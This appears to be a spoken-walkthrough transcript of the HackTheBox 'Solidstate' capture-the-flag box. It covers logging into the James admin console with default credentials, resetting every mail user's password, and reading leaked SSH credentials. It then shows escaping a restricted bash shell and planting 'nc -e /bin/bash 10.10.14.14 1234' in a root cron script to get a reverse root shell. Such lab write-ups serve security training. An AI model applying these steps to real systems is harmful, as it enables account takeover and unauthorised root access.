Today I'm going to be doing the Solidstate box from HackTheBox, and this is labeled as medium. I've already gone ahead and done the Nmap scan, so if we were to take a look at that, we see a few ports that are open. SSH, SMTP, HTTP, POP3, NMTP, and another port called James Admin on 4555. So I guess to start off with, well, the IP of this box is 10.10.10.51. To start off with, we can take a look at the HTTP port and see if there's anything interesting. We are presented with a website, obviously, and this is called the Solidstate Security, award-winning security team. And here we just see a bunch of text. At the bottom, we do see some contact information, so I am going to take this and I am going to put this into a pad. So we have Solidstate Security. I am going to add this into my host file. And that was 10.10.10.51. Add that. Okay. We could do a go buster on this. If we have a look at the website and see what possible extensions it has, so we have HTML, so we do with -x, HTML, and I always like to look for TXT files as well. We'll do 99 threads and we'll save this to http gobuster.txt. Okay, and we'll let that run. So if we have a look at these ports, 25, 110, and 4555, they're all running the same version of James. So if we have a look we look at search exploits for James, and it was using 232. We have a remote code execution script here. If we was to take a look at that, -x, then that's here. So the payload is just creating a file within the temp directory. Here's the actual command itself here. Credentials to James Remote Administration Tool is root. Okay, we have a look at some of the additional config. Is trying to connect to port 4555. Okay, so let us try and do that. Yeah, so default is root. So we can test the connection using netcat 4555, and it's asking us for a login ID. We can also use telnet, which is good enough as well. So we will do root welcome root help for a list of commands. Let's type in help. And these are the commands available to us. What's interesting is that we could set a password. Obviously, with us being root connected to this application, we should have full access to the application itself. We can delete users, we can verify, and we can also list users. So let's have a look at list users. And we have James, Thomas, John, Mindy, and male admin. So let's put that into our pad. Okay, and we can reset the passwords for these particular accounts here. So these are more than likely mail accounts, email accounts. So let's go ahead and reset the password. So we'll set a password for James, and we'll call this password reset. Set password Thomas. So the password I'm setting is just simply password. Set password John password. Set password Mindy password, and set mail. Set password mail admin to password. Okay, so all those accounts now have had their password reset to password. So let's try and log in. So we'll use an email client. I like to use Thunderbird, which isn't installed. So let's just go ahead and install that. So we can cancel that. We can sudo apt get install Thunderbird. Okay, Thunderbird. Okay, so let's add those accounts. I'll just put this like this. Account add James, add invalid email address. Should be right. So it's found solidstatesecurity.com because of our host file, username James, done. It's telling us this is not using encryption, which is fine. Let's add that. Let's add Thomas. Understand. Can't even read that. That says unable to log at server. Let's try the password again. Oh, maybe I didn't set this password correctly. Yeah, spelled it wrong there. Let's try that again. Okay, done. John. Okay. And we have a new, we've had a message already to John from mail admin, so we'll take a look at that in a minute. Mindy. Okay, done. And mail admin. So yeah, one thing I should probably explain is these ports here. So SMTP, which is used for outgoing mail, and POP3, which is used for incoming mail. Port 119 is the network news transfer protocol, I believe. I didn't see any need to enumerate this. Okay, so let's go here. So okay, so Mindy's got 2 emails, John has got 1 email. So new hire. Can you please restrict Mindy's access until she gets read onto the program? Also make sure that you send her a temporary password to log into her accounts. Okay. So Mindy, welcome. Welcome to the Solidstate Cyber team. We're delighted you are joining us as a junior defense analyst. Okay, and then your access, we have a username and password. Here are your SSH credentials. Okay. Brilliant. So let's try and log in via SSH. And that is 10, 10, 10, 51. It's asking us for a password. And we are in. Okay, so we should be able to read that file, the user flag. Okay, so WC is not available. LS is available. So bin is a directory. So if you go to bin, we can't cd into bin. I think cat might be available, but I don't want to reveal the user flag. So basically we are in a restrictive shell here. So we need to find a way of breaking out of it. So let's just do a quick Google search. Linux restrictive shell bypass. Eventually you'll find this guide here. It's on like one of the front pages. So if I was to Google Linux shell, and it's like the 3rd link down here. So basic introduction. Restrictive shell blocks, restricts some commands like cd, ls, echo, etc. The block environment variables like shell path user. Sometimes a restrictive shell can be blocked with the commands with slash or redirect outputs like that. Okay. So this is a good read. First we must check for available commands like cd, ls, echo. Well, cd doesn't work, ls does. I'm not sure about echo. Yeah, that works. We must check for operators like this. We need to check for available programming languages like Perl, Ruby, and Python. Perl, Ruby, Python. Which commands we can run as root. There's nothing there. Check for files or commands with the SUID perm. I don't think find is available. No. You must check in what shell you are in. Echo $shell. So echo $shell. And we're in the restrictive bash shell. So common exploitation techniques. So if slash is allowed, you can run bin sh or bin bash. I don't think either of those will work, but we'll give it a try. No. CP, I don't think CP is available. No. We didn't come in from FTP or GDB. More isn't available. Vim, also not available. Python isn't. We didn't come from SCP. Awk isn't available, and find isn't. So we don't have any programming languages that we can access. So advanced techniques from SSH, which is where we came from. So we can add the -t /bin/sh. And that's saying no because of the slash. We could try this. This one also won't work, but I'll just demonstrate it. Oop. Yeah, again. The next one is using bash --no profile. Okay. And yeah, we can now read the user flag. It's, so yeah, WC can read it now. Okay, so we should be able to cd bin that. Okay. And yeah, so these look like the only commands that are available to us: cat env and ls, which is sending them over to these locations where these commands are located. Okay, so two users, Mindy, which we have, and we have James as well. So let's see what we can do. Oh, sudo's not available. Let's have a look at any cron. Okay, nothing going on there. So this is what root is running currently. We can see here we have a script running from this directory. We can check that out. So this is located in the OPT folder. Let's have a look in that. So there's a file here called tmp. Let's have a look at that. So this looks like a basic script that removes the contents of tmp. That's fair enough. I wonder if this is being run every now and then. Let's have a look. PSPY. Okay, so yeah, this PSPY is a cool little program that looks at jobs being run as they're being run on the on a Linux system. So let's upload this sudo python -m simple http server. Okay, let's go back into our home directory. We'll create a new folder, pull all our stuff in. What's our IP? 10.10.14.14. Okay, so let's make that executable. And let's run it. So there's that script being run again. And yeah, this is the result of our GoBuster. I don't think any of that is relevant at this stage. Let's wait for some more things to run. Okay, and there we go. So we see that root indicated by the 0 is running this Python script here, tmp.py. Okay, that is fair enough. So what we can do is we can write to this script. So tmp, let us take a backup copy of this. Okay, we can't copy it there. We'll copy it to our home directory. Do we have nano? Okay, so let's remove this here. First of all, let's see nc-h. So we have netcat available to us, so we have the -e option, which is good. So we do nc-e/bin/bash 10.10.14.14 on port 1234. Let us open this port as a listener. 1, 2, 3, 4. Okay. Let us save that. Let's go back into our scripts. And I think all we need to do now is wait for a connection. Okay, that script has run netcat. If we have a look at our listener, we have a connection. Who am I? And we are root. And we see the root flag there, wc-c root.txt, and that's 33, as to be expected. Well, I guess that's it. Thank you for watching.